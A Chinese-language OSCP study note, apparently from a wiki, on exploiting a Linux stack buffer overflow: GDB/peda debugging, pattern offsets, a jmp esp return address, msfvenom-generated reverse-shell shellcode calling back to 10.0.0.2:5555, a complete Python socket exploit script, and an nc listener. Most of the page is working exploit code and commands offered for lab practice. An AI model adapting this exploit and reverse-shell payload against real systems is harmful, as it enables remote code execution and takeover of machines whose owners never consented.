缓存区溢出

oscp只考stack溢出

GDB调试

gdb -q ./add_record #-q安静模式
r

python -c "print('A'*500)"

Explain输入500个A后，程序出现溢出，如果将EIP寄存器中存在的AAAA替换成Payload就可以实现执行任意的命令

python -c "print('A'*200)"
python -c "print('A'*100)"

gdb-peda$:pattern create 100

AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

gdb-peda$:pattern search

python -c "print('A'*62 + 'CCCC')"

在Explain处输入构造字符，可以确认

disas main

break *0x0804873d

s #单步执行
c #继续执行

del 1
beark *0x0804877b

info func

debugger图形化工具调试

地址空间配置随机加载：是指地址空间配置随机加载（英语：Address space layout randomization，缩写ASLR，又称地址空间配置随机化、地址空间布局随机化）是一种防范内存损坏漏洞被利用的计算机安全技术。
edb-debugger：动态调试工具
msf-pattern_create：字符序列生成工具
msf-pattern_offset：字符偏移计算
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.2 LPORT=5555 -b "\x00" -f py

msf-pattern_offset -l 500 -q 64413764

#!/usr/bin/python
import sys,socket
payload = 'A'*112 + 'B'*4 + 'C'*32
try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('127.0.0.1',9898))
    s.send((payload))
    s.close()
except:
    print("Wrong!")
    sys.exit()

如果程序本身具有jmp esp指令，只需将0x08049d55内存地址写入攻击脚本**BBBB**位置处

具体代码如下'\x55\x9d\x04\08'

#-b 排除坏字符\x00(CPU终止符)
#-f 输出python格式的代码

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.2 LPORT=5555 -b "\x00" -f py

#生成内容
buf =  b""
buf += b"\xba\x1e\x76\xed\xa1\xdd\xc7\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x12\x31\x50\x12\x03\x50\x12\x83\xf6\x8a\x0f"
buf += b"\x54\x37\xa8\x27\x74\x64\x0d\x9b\x11\x88\x18\xfa\x56"
buf += b"\xea\xd7\x7d\x05\xab\x57\x42\xe7\xcb\xd1\xc4\x0e\xa3"
buf += b"\xeb\x36\xf1\x31\x84\x34\xf1\x20\xe7\xb0\x10\xfa\x61"
buf += b"\x93\x83\xa9\xde\x10\xad\xac\xec\x97\xff\x46\x81\xb8"
buf += b"\x8c\xfe\x35\xe8\x5d\x9c\xac\x7f\x42\x32\x7c\x09\x64"
buf += b"\x02\x89\xc4\xe7"

#\x90是nop,可以加入4的倍数个，使程序运行更稳定

#!/usr/bin/python
import sys,socket

buf =  b""
buf += b"\xba\x1e\x76\xed\xa1\xdd\xc7\xd9\x74\x24\xf4\x58\x29"
buf += b"\xc9\xb1\x12\x31\x50\x12\x03\x50\x12\x83\xf6\x8a\x0f"
buf += b"\x54\x37\xa8\x27\x74\x64\x0d\x9b\x11\x88\x18\xfa\x56"
buf += b"\xea\xd7\x7d\x05\xab\x57\x42\xe7\xcb\xd1\xc4\x0e\xa3"
buf += b"\xeb\x36\xf1\x31\x84\x34\xf1\x20\xe7\xb0\x10\xfa\x61"
buf += b"\x93\x83\xa9\xde\x10\xad\xac\xec\x97\xff\x46\x81\xb8"
buf += b"\x8c\xfe\x35\xe8\x5d\x9c\xac\x7f\x42\x32\x7c\x09\x64"
buf += b"\x02\x89\xc4\xe7"

payload = b'A'*112 + b'\x55\x9d\x04\x08' + b'\x90'*32 +buf
try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('{target_ip}','{port}'))
    s.send((payload))
    s.close()
except:
    print("Wrong!")
    sys.exit()

nc -lnvp 5555

python exp.py

关于数据值与内存地址

EIP: 0x45444342 ('BCDE') B对应的是42：EIP: 0x45444342 ('BCDE') C对应的是43：EIP: 0x45444342 ('BCDE') D对应的是44：EIP: 0x45444342 ('BCDE') E对应的是45：EIP: 0x45444342 ('BCDE')

上一页cheatsheet 下一页AD域渗透

最后更新于2年前

这有帮助吗？